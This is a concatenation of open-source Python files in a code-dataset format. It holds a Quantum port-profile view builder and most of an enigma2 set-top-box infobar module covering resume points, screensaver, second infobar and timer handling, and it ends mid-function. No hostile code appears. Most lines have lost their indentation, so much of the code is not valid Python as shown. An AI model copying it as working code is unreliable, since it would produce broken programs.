    register()
| james-massey/AdvancedReality | Blender Plugin/CoordinateTrack.py | Python | apache-2.0 | 1,302 |
"""
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2011 Cisco Systems, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Ying Liu, Cisco Systems, Inc.
#
"""
def get_view_builder(req):
"""get view builder"""
base_url = req.application_url
return ViewBuilder(base_url)
class ViewBuilder(object):
"""
ViewBuilder for Portprofile,
derived from quantum.views.networks
"""
def __init__(self, base_url):
"""
:param base_url: url of the root wsgi application
"""
self.base_url = base_url
def build(self, portprofile_data, is_detail=False):
"""Generic method used to generate a portprofile entity."""
if is_detail:
portprofile = self._build_detail(portprofile_data)
else:
portprofile = self._build_simple(portprofile_data)
return portprofile
def _build_simple(self, portprofile_data):
"""Return a simple description of a portprofile"""
return dict(portprofile=dict(id=portprofile_data['profile_id']))
    def _build_detail(self, portprofile_data):
        """Return a detailed description of a portprofile."""
        portprofile = dict(id=portprofile_data['profile_id'],
                           name=portprofile_data['profile_name'],
                           qos_name=portprofile_data['qos_name'])
        if portprofile_data['assignment'] is not None:
            portprofile['assignment'] = portprofile_data['assignment']
        return dict(portprofile=portprofile)
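# Illustrative usage sketch (not part of the original module): FakeRequest is
# a hypothetical stand-in for a WSGI request; only application_url is read.
if __name__ == '__main__':
    class FakeRequest(object):
        application_url = 'http://localhost:9696'
    builder = get_view_builder(FakeRequest())
    sample = {'profile_id': '42', 'profile_name': 'web-profile',
              'qos_name': 'gold', 'assignment': None}
    print builder.build(sample)                  # -> {'portprofile': {'id': '42'}}
    print builder.build(sample, is_detail=True)  # adds name and qos_name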
| rcbops/quantum-buildpackage | quantum/extensions/_pprofiles.py | Python | apache-2.0 | 2,300 |
# -*- coding: utf-8 -*-
from Components.ActionMap import ActionMap, HelpableActionMap, NumberActionMap
from Components.Harddisk import harddiskmanager, findMountPoint
from Components.Input import Input
from Components.Label import Label
from Components.MovieList import AUDIO_EXTENSIONS, MOVIE_EXTENSIONS, DVD_EXTENSIONS
from Components.PluginComponent import plugins
from Components.ServiceEventTracker import ServiceEventTracker
from Components.Sources.ServiceEvent import ServiceEvent
from Components.Sources.Boolean import Boolean
from Components.Sources.List import List
from Components.config import config, configfile, ConfigBoolean, ConfigClock
from Components.SystemInfo import SystemInfo
from Components.UsageConfig import preferredInstantRecordPath, defaultMoviePath, preferredTimerPath, ConfigSelection
from Components.VolumeControl import VolumeControl
from Components.Pixmap import MovingPixmap, MultiPixmap
from Components.Sources.StaticText import StaticText
from Components.ScrollLabel import ScrollLabel
from Plugins.Plugin import PluginDescriptor
from Components.Timeshift import InfoBarTimeshift
from Screens.Screen import Screen
from Screens import ScreenSaver
from Screens.ChannelSelection import ChannelSelection, PiPZapSelection, BouquetSelector, SilentBouquetSelector, EpgBouquetSelector, service_types_tv
from Screens.ChoiceBox import ChoiceBox
from Screens.Dish import Dish
from Screens.EventView import EventViewEPGSelect, EventViewSimple
from Screens.EpgSelection import EPGSelection
from Screens.InputBox import InputBox
from Screens.MessageBox import MessageBox
from Screens.MinuteInput import MinuteInput
from Screens.TimerSelection import TimerSelection
from Screens.PictureInPicture import PictureInPicture
from Screens.PVRState import PVRState, TimeshiftState
from Screens.SubtitleDisplay import SubtitleDisplay
from Screens.RdsDisplay import RdsInfoDisplay, RassInteractive
from Screens.Standby import Standby, TryQuitMainloop
from Screens.TimeDateInput import TimeDateInput
from Screens.TimerEdit import TimerEditList, TimerSanityConflict
from Screens.UnhandledKey import UnhandledKey
from ServiceReference import ServiceReference, isPlayableForCur
from RecordTimer import RecordTimer, RecordTimerEntry, parseEvent, AFTEREVENT, findSafeRecordPath
from Screens.TimerEntry import TimerEntry
from Tools.Directories import SCOPE_VOD
from Tools import Directories, Notifications
from Tools.BoundFunction import boundFunction
from Tools.Directories import pathExists, fileExists, getRecordingFilename, copyfile, moveFiles, resolveFilename, SCOPE_TIMESHIFT, SCOPE_CURRENT_SKIN
from Tools.KeyBindings import getKeyDescription
from enigma import eTimer, eServiceCenter, eDVBServicePMTHandler, iServiceInformation, iPlayableService, eServiceReference, eEPGCache, eActionMap, eDVBVolumecontrol, getDesktop, quitMainloop, eDVBDB
from boxbranding import getBoxType, getMachineProcModel, getMachineBuild, getMachineBrand, getMachineName
from time import time, localtime, strftime
from bisect import insort
from sys import maxint
from keyids import KEYIDS
from datetime import datetime
import os, cPickle
# hack alert!
from Screens.Menu import MainMenu, Menu, mdom
from Screens.Setup import Setup
import Screens.Standby
AUDIO = False
seek_withjumps_muted = False
jump_pts_adder = 0
jump_last_pts = None
jump_last_pos = None
if fileExists("/usr/lib/enigma2/python/Plugins/Extensions/CoolTVGuide/plugin.pyo"):
COOLTVGUIDE = True
else:
COOLTVGUIDE = False
def isStandardInfoBar(self):
return self.__class__.__name__ == "InfoBar"
def isMoviePlayerInfoBar(self):
return self.__class__.__name__ == "MoviePlayer"
def setResumePoint(session):
global resumePointCache, resumePointCacheLast
service = session.nav.getCurrentService()
ref = session.nav.getCurrentlyPlayingServiceOrGroup()
if (service is not None) and (ref is not None): # and (ref.type != 1):
# ref type 1 has its own memory...
seek = service.seek()
if seek:
pos = seek.getPlayPosition()
if not pos[0]:
key = ref.toString()
lru = int(time())
l = seek.getLength()
if l:
l = l[1]
else:
l = None
resumePointCache[key] = [lru, pos[1], l]
for k, v in resumePointCache.items():
if v[0] < lru:
candidate = k
filepath = os.path.realpath(candidate.split(':')[-1])
mountpoint = findMountPoint(filepath)
if os.path.ismount(mountpoint) and not os.path.exists(filepath):
del resumePointCache[candidate]
saveResumePoints()
def delResumePoint(ref):
global resumePointCache, resumePointCacheLast
try:
del resumePointCache[ref.toString()]
except KeyError:
pass
saveResumePoints()
def getResumePoint(session):
global resumePointCache
ref = session.nav.getCurrentlyPlayingServiceOrGroup()
if (ref is not None) and (ref.type != 1):
try:
entry = resumePointCache[ref.toString()]
entry[0] = int(time()) # update LRU timestamp
return entry[1]
except KeyError:
return None
def saveResumePoints():
global resumePointCache, resumePointCacheLast
try:
f = open('/etc/enigma2/resumepoints.pkl', 'wb')
cPickle.dump(resumePointCache, f, cPickle.HIGHEST_PROTOCOL)
f.close()
except Exception, ex:
print "[InfoBar] Failed to write resumepoints:", ex
resumePointCacheLast = int(time())
def loadResumePoints():
try:
file = open('/etc/enigma2/resumepoints.pkl', 'rb')
PickleFile = cPickle.load(file)
file.close()
return PickleFile
except Exception, ex:
print "[InfoBar] Failed to load resumepoints:", ex
return {}
def updateresumePointCache():
global resumePointCache
resumePointCache = loadResumePoints()
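# Standalone sketch of the cache round trip above (illustrative only; uses a
# temporary file instead of /etc/enigma2/resumepoints.pkl).  Each entry maps
# a service-reference string to [lru_timestamp, play_position, length].
def _demoResumePointRoundtrip():
	import cPickle, os, tempfile
	cache = {'1:0:19:283D:3FB:1:C00000:0:0:0:': [int(time()), 90000, 180000]}
	path = tempfile.mktemp(suffix='.pkl')
	f = open(path, 'wb')
	cPickle.dump(cache, f, cPickle.HIGHEST_PROTOCOL)
	f.close()
	f = open(path, 'rb')
	restored = cPickle.load(f)
	f.close()
	os.unlink(path)
	assert restored == cache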
def ToggleVideo():
	# Toggle the video display policy between letterbox and panscan; any
	# other current policy also falls back to panscan.
	f = open("/proc/stb/video/policy")
	mode = f.read().strip()
	f.close()
	print "[InfoBarGenerics] video policy was:", mode
	newmode = "letterbox" if mode == "panscan" else "panscan"
	f = open("/proc/stb/video/policy", "w")
	f.write(newmode)
	f.close()
resumePointCache = loadResumePoints()
resumePointCacheLast = int(time())
class InfoBarDish:
def __init__(self):
self.dishDialog = self.session.instantiateDialog(Dish)
self.dishDialog.setAnimationMode(0)
class InfoBarLongKeyDetection:
def __init__(self):
eActionMap.getInstance().bindAction('', -maxint -1, self.detection) #highest prio
self.LongButtonPressed = False
#this function is called on every keypress!
def detection(self, key, flag):
if flag == 3:
self.LongButtonPressed = True
elif flag == 0:
self.LongButtonPressed = False
class InfoBarUnhandledKey:
def __init__(self):
self.unhandledKeyDialog = self.session.instantiateDialog(UnhandledKey)
self.unhandledKeyDialog.setAnimationMode(0)
self.hideUnhandledKeySymbolTimer = eTimer()
self.hideUnhandledKeySymbolTimer.callback.append(self.unhandledKeyDialog.hide)
self.checkUnusedTimer = eTimer()
self.checkUnusedTimer.callback.append(self.checkUnused)
self.onLayoutFinish.append(self.unhandledKeyDialog.hide)
eActionMap.getInstance().bindAction('', -maxint -1, self.actionA) #highest prio
eActionMap.getInstance().bindAction('', maxint, self.actionB) #lowest prio
self.flags = (1<<1)
self.uflags = 0
#this function is called on every keypress!
def actionA(self, key, flag):
try:
print 'KEY: %s %s %s %s' % (key,flag,(key_name for key_name,value in KEYIDS.items() if value==key).next(),getKeyDescription(key)[0])
except:
try:
print 'KEY: %s %s %s' % (key,flag,(key_name for key_name,value in KEYIDS.items() if value==key).next()) # inverse dictionary lookup in KEYIDS
except:
print 'KEY: %s %s' % (key,flag)
self.unhandledKeyDialog.hide()
if self.closeSIB(key) and self.secondInfoBarScreen and self.secondInfoBarScreen.shown:
self.secondInfoBarScreen.hide()
self.secondInfoBarWasShown = False
if flag != 4:
if self.flags & (1<<1):
self.flags = self.uflags = 0
self.flags |= (1<<flag)
if flag == 1: # break
self.checkUnusedTimer.start(0, True)
return 0
	def closeSIB(self, key):
		# any key except volume, seek and navigation keys closes the second infobar
		return key >= 12 and key not in (114, 115, 352, 103, 108, 402, 403, 407, 412, 358)
#this function is only called when no other action has handled this key
def actionB(self, key, flag):
if flag != 4:
self.uflags |= (1<<flag)
def checkUnused(self):
if self.flags == self.uflags:
self.unhandledKeyDialog.show()
self.hideUnhandledKeySymbolTimer.start(2000, True)
class InfoBarScreenSaver:
def __init__(self):
self.onExecBegin.append(self.__onExecBegin)
self.onExecEnd.append(self.__onExecEnd)
self.screenSaverTimer = eTimer()
self.screenSaverTimer.callback.append(self.screensaverTimeout)
self.screensaver = self.session.instantiateDialog(ScreenSaver.Screensaver)
self.onLayoutFinish.append(self.__layoutFinished)
def __layoutFinished(self):
self.screensaver.hide()
def __onExecBegin(self):
self.ScreenSaverTimerStart()
def __onExecEnd(self):
if self.screensaver.shown:
self.screensaver.hide()
eActionMap.getInstance().unbindAction('', self.keypressScreenSaver)
self.screenSaverTimer.stop()
def ScreenSaverTimerStart(self):
time = int(config.usage.screen_saver.value)
flag = self.seekstate[0]
if not flag:
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if ref and not (hasattr(self.session, "pipshown") and self.session.pipshown):
ref = ref.toString().split(":")
flag = ref[2] == "2" or os.path.splitext(ref[10])[1].lower() in AUDIO_EXTENSIONS
if time and flag:
self.screenSaverTimer.startLongTimer(time)
else:
self.screenSaverTimer.stop()
def screensaverTimeout(self):
if self.execing and not Screens.Standby.inStandby and not Screens.Standby.inTryQuitMainloop:
self.hide()
if hasattr(self, "pvrStateDialog"):
try:
self.pvrStateDialog.hide()
except:
pass
self.screensaver.show()
eActionMap.getInstance().bindAction('', -maxint - 1, self.keypressScreenSaver)
def keypressScreenSaver(self, key, flag):
if flag:
self.screensaver.hide()
self.show()
self.ScreenSaverTimerStart()
eActionMap.getInstance().unbindAction('', self.keypressScreenSaver)
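# Sketch of the audio-service test in ScreenSaverTimerStart above
# (illustrative): field 2 of a full service-reference string is the service
# type ("2" means radio) and field 10 is the file path, so file playback is
# recognised by its extension via AUDIO_EXTENSIONS (imported at the top).
def _demoIsAudioService(refstring):
	fields = refstring.split(":")
	return fields[2] == "2" or os.path.splitext(fields[10])[1].lower() in AUDIO_EXTENSIONS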
class HideVBILine(Screen):
skin = """<screen position="0,0" size="%s,%s" backgroundColor="#000000" flags="wfNoBorder"/>""" % (getDesktop(0).size().width() * 2/3, getDesktop(0).size().height() / 360)
def __init__(self, session):
Screen.__init__(self, session)
class SecondInfoBar(Screen):
ADD_TIMER = 0
REMOVE_TIMER = 1
def __init__(self, session):
Screen.__init__(self, session)
if config.usage.show_second_infobar.value == "3" and (config.skin.primary_skin.value == "OPD-Blue-Line/skin.xml" or config.skin.primary_skin.value.startswith('OPD-Blue-Line/skin.xml')):
self.skinName = "SecondInfoBar/OPD-Blue-Line/skin.xml"
else:
self.skinName = "SecondInfoBar"
self["epg_description"] = ScrollLabel()
self["FullDescription"] = ScrollLabel()
self["channel"] = Label()
self["key_red"] = Label()
self["key_green"] = Label()
self["key_yellow"] = Label()
self["key_blue"] = Label()
self["SecondInfoBar"] = ActionMap(["2ndInfobarActions"],
{
"pageUp": self.pageUp,
"pageDown": self.pageDown,
"prevPage": self.pageUp,
"nextPage": self.pageDown,
"prevEvent": self.prevEvent,
"nextEvent": self.nextEvent,
"timerAdd": self.timerAdd,
"openSimilarList": self.openSimilarList,
}, -1)
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evUpdatedEventInfo: self.getEvent
})
self.onShow.append(self.__Show)
self.onHide.append(self.__Hide)
def pageUp(self):
self["epg_description"].pageUp()
self["FullDescription"].pageUp()
def pageDown(self):
self["epg_description"].pageDown()
self["FullDescription"].pageDown()
def __Show(self):
if config.plisettings.ColouredButtons.value:
self["key_yellow"].setText(_("Extensions"))
self["key_red"].setText(_("EPG"))
self["key_blue"].setText(_("Blue Panel"))
self["SecondInfoBar"].doBind()
self.getEvent()
def __Hide(self):
if self["SecondInfoBar"].bound:
self["SecondInfoBar"].doUnbind()
def getEvent(self):
self["epg_description"].setText("")
self["FullDescription"].setText("")
self["channel"].setText("")
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
self.getNowNext()
epglist = self.epglist
if not epglist:
self.is_now_next = False
epg = eEPGCache.getInstance()
ptr = ref and ref.valid() and epg.lookupEventTime(ref, -1)
if ptr:
epglist.append(ptr)
ptr = epg.lookupEventTime(ref, ptr.getBeginTime(), +1)
if ptr:
epglist.append(ptr)
else:
self.is_now_next = True
if epglist:
Event = self.epglist[0]
Ref = ServiceReference(ref)
callback = self.eventViewCallback
self.cbFunc = callback
self.currentService = Ref
self.isRecording = (not Ref.ref.flags & eServiceReference.isGroup) and Ref.ref.getPath()
self.event = Event
self.key_green_choice = self.ADD_TIMER
if self.isRecording:
self["key_green"].setText("")
else:
self["key_green"].setText(_("Add timer"))
self.setEvent(self.event)
def getNowNext(self):
epglist = [ ]
service = self.session.nav.getCurrentService()
info = service and service.info()
ptr = info and info.getEvent(0)
if ptr:
epglist.append(ptr)
ptr = info and info.getEvent(1)
if ptr:
epglist.append(ptr)
self.epglist = epglist
def eventViewCallback(self, setEvent, setService, val): #used for now/next displaying
epglist = self.epglist
if len(epglist) > 1:
tmp = epglist[0]
epglist[0] = epglist[1]
epglist[1] = tmp
setEvent(epglist[0])
def prevEvent(self):
if self.cbFunc is not None:
self.cbFunc(self.setEvent, self.setService, -1)
def nextEvent(self):
if self.cbFunc is not None:
self.cbFunc(self.setEvent, self.setService, +1)
def removeTimer(self, timer):
timer.afterEvent = AFTEREVENT.NONE
self.session.nav.RecordTimer.removeEntry(timer)
self["key_green"].setText(_("Add timer"))
self.key_green_choice = self.ADD_TIMER
def timerAdd(self):
self.hide()
self.secondInfoBarWasShown = False
if self.isRecording:
return
event = self.event
serviceref = self.currentService
if event is None:
return
eventid = event.getEventId()
refstr = serviceref.ref.toString()
for timer in self.session.nav.RecordTimer.timer_list:
if timer.eit == eventid and timer.service_ref.ref.toString() == refstr:
cb_func = lambda ret : not ret or self.removeTimer(timer)
self.session.openWithCallback(cb_func, MessageBox, _("Do you really want to delete %s?") % event.getEventName())
break
else:
newEntry = RecordTimerEntry(self.currentService, afterEvent = AFTEREVENT.AUTO, justplay = False, always_zap = False, checkOldTimers = True, dirname = preferredTimerPath(), *parseEvent(self.event))
self.session.openWithCallback(self.finishedAdd, TimerEntry, newEntry)
def finishedAdd(self, answer):
# print "finished add"
if answer[0]:
entry = answer[1]
simulTimerList = self.session.nav.RecordTimer.record(entry)
if simulTimerList is not None:
for x in simulTimerList:
if x.setAutoincreaseEnd(entry):
self.session.nav.RecordTimer.timeChanged(x)
simulTimerList = self.session.nav.RecordTimer.record(entry)
if simulTimerList is not None:
if not entry.repeated and not config.recording.margin_before.value and not config.recording.margin_after.value and len(simulTimerList) > 1:
change_time = False
conflict_begin = simulTimerList[1].begin
conflict_end = simulTimerList[1].end
if conflict_begin == entry.end:
entry.end -= 30
change_time = True
elif entry.begin == conflict_end:
entry.begin += 30
change_time = True
if change_time:
simulTimerList = self.session.nav.RecordTimer.record(entry)
if simulTimerList is not None:
self.session.openWithCallback(self.finishSanityCorrection, TimerSanityConflict, simulTimerList)
self["key_green"].setText(_("Remove timer"))
self.key_green_choice = self.REMOVE_TIMER
else:
self["key_green"].setText(_("Add timer"))
self.key_green_choice = self.ADD_TIMER
# print "Timeredit aborted"
def finishSanityCorrection(self, answer):
self.finishedAdd(answer)
def setService(self, service):
self.currentService=service
if self.isRecording:
self["channel"].setText(_("Recording"))
else:
name = self.currentService.getServiceName()
if name is not None:
self["channel"].setText(name)
else:
self["channel"].setText(_("unknown service"))
def sort_func(self,x,y):
if x[1] < y[1]:
return -1
elif x[1] == y[1]:
return 0
else:
return 1
def setEvent(self, event):
if event is None:
return
self.event = event
try:
name = event.getEventName()
self["channel"].setText(name)
except:
pass
description = event.getShortDescription()
extended = event.getExtendedDescription()
if description and extended:
description += '\n'
text = description + extended
self.setTitle(event.getEventName())
self["epg_description"].setText(text)
serviceref = self.currentService
eventid = self.event.getEventId()
refstr = serviceref.ref.toString()
isRecordEvent = False
for timer in self.session.nav.RecordTimer.timer_list:
if timer.eit == eventid and timer.service_ref.ref.toString() == refstr:
isRecordEvent = True
break
if isRecordEvent and self.key_green_choice != self.REMOVE_TIMER:
self["key_green"].setText(_("Remove timer"))
self.key_green_choice = self.REMOVE_TIMER
elif not isRecordEvent and self.key_green_choice != self.ADD_TIMER:
self["key_green"].setText(_("Add timer"))
self.key_green_choice = self.ADD_TIMER
def openSimilarList(self):
id = self.event and self.event.getEventId()
refstr = str(self.currentService)
if id is not None:
self.hide()
self.secondInfoBarWasShown = False
self.session.open(EPGSelection, refstr, None, id)
class InfoBarShowHide(InfoBarScreenSaver):
""" InfoBar show/hide control, accepts toggleShow and hide actions, might start
fancy animations. """
STATE_HIDDEN = 0
STATE_HIDING = 1
STATE_SHOWING = 2
STATE_SHOWN = 3
skipToggleShow = False
def __init__(self):
self["ShowHideActions"] = ActionMap( ["InfobarShowHideActions"] ,
{
"LongOKPressed": self.toggleShowLong,
"toggleShow": self.OkPressed,
"hide": self.keyHide,
}, 1) # lower prio to make it possible to override ok and cancel..
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evStart: self.serviceStarted,
})
InfoBarScreenSaver.__init__(self)
self.__state = self.STATE_SHOWN
self.__locked = 0
self.DimmingTimer = eTimer()
self.DimmingTimer.callback.append(self.doDimming)
self.hideTimer = eTimer()
self.hideTimer.callback.append(self.doTimerHide)
self.hideTimer.start(5000, True)
self.onShow.append(self.__onShow)
self.onHide.append(self.__onHide)
self.hideVBILineScreen = self.session.instantiateDialog(HideVBILine)
self.hideVBILineScreen.show()
self.onShowHideNotifiers = []
self.standardInfoBar = False
self.lastSecondInfoBar = 0
self.lastResetAlpha = True
self.secondInfoBarScreen = ""
if isStandardInfoBar(self):
self.SwitchSecondInfoBarScreen()
self.onLayoutFinish.append(self.__layoutFinished)
self.onExecBegin.append(self.__onExecBegin)
def __onExecBegin(self):
self.showHideVBI()
def __layoutFinished(self):
if self.secondInfoBarScreen:
self.secondInfoBarScreen.hide()
self.standardInfoBar = True
self.secondInfoBarWasShown = False
self.EventViewIsShown = False
self.hideVBILineScreen.hide()
try:
if self.pvrStateDialog:
pass
except:
self.pvrStateDialog = None
def OkPressed(self):
if config.usage.okbutton_mode.value == "0":
self.toggleShow()
elif config.usage.okbutton_mode.value == "1":
try:
self.openServiceList()
except:
self.toggleShow()
elif config.usage.okbutton_mode.value == "2" and COOLTVGUIDE:
self.showCoolInfoGuide()
elif config.usage.okbutton_mode.value == "3" and COOLTVGUIDE:
self.showCoolSingleGuide()
elif config.usage.okbutton_mode.value == "4" and COOLTVGUIDE:
if self.isInfo:
self.showCoolTVGuide()
elif config.usage.okbutton_mode.value == "5" and COOLTVGUIDE:
self.showCoolEasyGuide()
elif config.usage.okbutton_mode.value == "6" and COOLTVGUIDE:
self.showCoolChannelGuide()
def SwitchSecondInfoBarScreen(self):
if self.lastSecondInfoBar == int(config.usage.show_second_infobar.value):
return
self.secondInfoBarScreen = self.session.instantiateDialog(SecondInfoBar)
self.lastSecondInfoBar = int(config.usage.show_second_infobar.value)
def LongOKPressed(self):
if isinstance(self, InfoBarEPG):
if config.plisettings.InfoBarEpg_mode.value == "1":
self.openInfoBarEPG()
def __onShow(self):
self.__state = self.STATE_SHOWN
for x in self.onShowHideNotifiers:
x(True)
self.startHideTimer()
VolumeControl.instance and VolumeControl.instance.showMute()
def doDimming(self):
if config.usage.show_infobar_do_dimming.value:
self.dimmed = self.dimmed-1
else:
self.dimmed = 0
self.DimmingTimer.stop()
self.doHide()
def unDimming(self):
self.unDimmingTimer.stop()
self.doWriteAlpha(config.av.osd_alpha.value)
def doWriteAlpha(self, value):
if fileExists("/proc/stb/video/alpha"):
f=open("/proc/stb/video/alpha","w")
f.write("%i" % (value))
f.close()
if value == config.av.osd_alpha.value:
self.lastResetAlpha = True
else:
self.lastResetAlpha = False
def __onHide(self):
self.__state = self.STATE_HIDDEN
self.resetAlpha()
for x in self.onShowHideNotifiers:
x(False)
def resetAlpha(self):
if config.usage.show_infobar_do_dimming.value and self.lastResetAlpha is False:
self.unDimmingTimer = eTimer()
self.unDimmingTimer.callback.append(self.unDimming)
self.unDimmingTimer.start(300, True)
def keyHide(self):
if self.__state == self.STATE_HIDDEN:
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if ref:
ref = ref.toString()
else:
ref = " "
if config.plisettings.InfoBarEpg_mode.value == "2" and not ref[1:].startswith(":0:0:0:0:0:0:0:0:0:"):
self.openInfoBarEPG()
else:
self.hide()
if self.secondInfoBarScreen and self.secondInfoBarScreen.shown:
self.secondInfoBarScreen.hide()
self.secondInfoBarWasShown = False
if self.session.pipshown and "popup" in config.usage.pip_hideOnExit.value:
if config.usage.pip_hideOnExit.value == "popup":
self.session.openWithCallback(self.hidePipOnExitCallback, MessageBox, _("Disable Picture in Picture"), simple=True)
else:
self.hidePipOnExitCallback(True)
else:
self.hide()
if hasattr(self, "pvrStateDialog"):
self.pvrStateDialog.hide()
def hidePipOnExitCallback(self, answer):
if answer:
self.showPiP()
def connectShowHideNotifier(self, fnc):
if not fnc in self.onShowHideNotifiers:
self.onShowHideNotifiers.append(fnc)
def disconnectShowHideNotifier(self, fnc):
if fnc in self.onShowHideNotifiers:
self.onShowHideNotifiers.remove(fnc)
def serviceStarted(self):
if self.execing:
if config.usage.show_infobar_on_zap.value:
self.doShow()
self.showHideVBI()
def startHideTimer(self):
if self.__state == self.STATE_SHOWN and not self.__locked:
self.hideTimer.stop()
idx = config.usage.infobar_timeout.index
if idx:
self.hideTimer.start(idx*1000, True)
elif (self.secondInfoBarScreen and self.secondInfoBarScreen.shown) or ((not config.usage.show_second_infobar.value or isMoviePlayerInfoBar(self)) and self.EventViewIsShown):
self.hideTimer.stop()
idx = config.usage.second_infobar_timeout.index
if idx:
self.hideTimer.start(idx*1000, True)
elif hasattr(self, "pvrStateDialog"):
self.hideTimer.stop()
#idx = config.usage.infobar_timeout.index
#if idx:
# self.hideTimer.start(idx*1000, True)
self.skipToggleShow = False
def doShow(self):
self.show()
self.hideTimer.stop()
self.DimmingTimer.stop()
self.doWriteAlpha(config.av.osd_alpha.value)
self.startHideTimer()
def doTimerHide(self):
self.hideTimer.stop()
self.DimmingTimer.start(300, True)
self.dimmed = config.usage.show_infobar_dimming_speed.value
self.skipToggleShow = False
def doHide(self):
if self.__state != self.STATE_HIDDEN:
if self.dimmed > 0:
self.doWriteAlpha((config.av.osd_alpha.value*self.dimmed/config.usage.show_infobar_dimming_speed.value))
self.DimmingTimer.start(5, True)
else:
self.DimmingTimer.stop()
self.hide()
elif self.__state == self.STATE_HIDDEN and self.secondInfoBarScreen and self.secondInfoBarScreen.shown:
if self.dimmed > 0:
self.doWriteAlpha((config.av.osd_alpha.value*self.dimmed/config.usage.show_infobar_dimming_speed.value))
self.DimmingTimer.start(5, True)
else:
self.DimmingTimer.stop()
self.secondInfoBarScreen.hide()
self.secondInfoBarWasShown = False
self.resetAlpha()
elif self.__state == self.STATE_HIDDEN and self.EventViewIsShown:
try:
self.eventView.close()
except:
pass
self.EventViewIsShown = False
# elif hasattr(self, "pvrStateDialog"):
# if self.dimmed > 0:
# self.doWriteAlpha((config.av.osd_alpha.value*self.dimmed/config.usage.show_infobar_dimming_speed.value))
# self.DimmingTimer.start(5, True)
# else:
# self.DimmingTimer.stop()
# try:
# self.pvrStateDialog.hide()
# except:
# pass
def toggleShow(self):
if self.skipToggleShow:
self.skipToggleShow = False
return
if not hasattr(self, "LongButtonPressed"):
self.LongButtonPressed = False
if not self.LongButtonPressed:
if self.__state == self.STATE_HIDDEN:
if not self.secondInfoBarWasShown or (config.usage.show_second_infobar.value == "1" and not self.EventViewIsShown):
self.show()
if self.secondInfoBarScreen:
self.secondInfoBarScreen.hide()
self.secondInfoBarWasShown = False
self.EventViewIsShown = False
elif self.secondInfoBarScreen and (config.usage.show_second_infobar.value == "2" or config.usage.show_second_infobar.value == "3") and not self.secondInfoBarScreen.shown:
self.SwitchSecondInfoBarScreen()
self.hide()
self.secondInfoBarScreen.show()
self.secondInfoBarWasShown = True
self.startHideTimer()
elif (config.usage.show_second_infobar.value == "1" or isMoviePlayerInfoBar(self)) and not self.EventViewIsShown:
self.hide()
try:
self.openEventView()
except:
pass
self.EventViewIsShown = True
self.hideTimer.stop()
elif isMoviePlayerInfoBar(self) and not self.EventViewIsShown and config.usage.show_second_infobar.value:
self.hide()
self.openEventView(True)
self.EventViewIsShown = True
self.startHideTimer()
else:
self.hide()
if self.secondInfoBarScreen and self.secondInfoBarScreen.shown:
self.secondInfoBarScreen.hide()
elif self.EventViewIsShown:
try:
self.eventView.close()
except:
pass
self.EventViewIsShown = False
def toggleShowLong(self):
try:
if self.LongButtonPressed:
if isinstance(self, InfoBarEPG):
if config.plisettings.InfoBarEpg_mode.value == "1":
self.openInfoBarEPG()
except Exception, e:
print "[InfoBarGenerics] 'toggleShowLong' failed:", e
def lockShow(self):
try:
self.__locked += 1
except:
self.__locked = 0
if self.execing:
self.show()
self.hideTimer.stop()
self.skipToggleShow = False
def unlockShow(self):
if config.usage.show_infobar_do_dimming.value and self.lastResetAlpha is False:
self.doWriteAlpha(config.av.osd_alpha.value)
try:
self.__locked -= 1
except:
self.__locked = 0
if self.__locked <0:
self.__locked = 0
if self.execing:
self.startHideTimer()
def openEventView(self, simple=False):
try:
if self.servicelist is None:
return
except:
simple = True
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
self.getNowNext()
epglist = self.epglist
if not epglist:
self.is_now_next = False
epg = eEPGCache.getInstance()
ptr = ref and ref.valid() and epg.lookupEventTime(ref, -1)
if ptr:
epglist.append(ptr)
ptr = epg.lookupEventTime(ref, ptr.getBeginTime(), +1)
if ptr:
epglist.append(ptr)
else:
self.is_now_next = True
if epglist:
if not simple:
self.eventView = self.session.openWithCallback(self.closed, EventViewEPGSelect, epglist[0], ServiceReference(ref), self.eventViewCallback, self.openSingleServiceEPG, self.openMultiServiceEPG, self.openSimilarList)
self.dlg_stack.append(self.eventView)
else:
self.eventView = self.session.openWithCallback(self.closed, EventViewSimple, epglist[0], ServiceReference(ref))
self.dlg_stack = None
def getNowNext(self):
epglist = [ ]
service = self.session.nav.getCurrentService()
info = service and service.info()
ptr = info and info.getEvent(0)
if ptr:
epglist.append(ptr)
ptr = info and info.getEvent(1)
if ptr:
epglist.append(ptr)
self.epglist = epglist
def closed(self, ret=False):
if not self.dlg_stack:
return
closedScreen = self.dlg_stack.pop()
if self.eventView and closedScreen == self.eventView:
self.eventView = None
if ret == True or ret == 'close':
dlgs=len(self.dlg_stack)
if dlgs > 0:
self.dlg_stack[dlgs-1].close(dlgs > 1)
self.reopen(ret)
def eventViewCallback(self, setEvent, setService, val): #used for now/next displaying
epglist = self.epglist
if len(epglist) > 1:
tmp = epglist[0]
epglist[0] = epglist[1]
epglist[1] = tmp
setEvent(epglist[0])
def showCoolInfoGuide(self):
if self.servicelist is None:
return
if COOLTVGUIDE:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Cool Info Guide"):
self.runPlugin(plugin)
break
else:
self.session.open(MessageBox, _("The Cool TV Guide plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showCoolSingleGuide(self):
if self.servicelist is None:
return
if COOLTVGUIDE:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Cool Single Guide"):
self.runPlugin(plugin)
break
else:
self.session.open(MessageBox, _("The Cool TV Guide plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showCoolTVGuide(self):
if self.servicelist is None:
return
if COOLTVGUIDE:
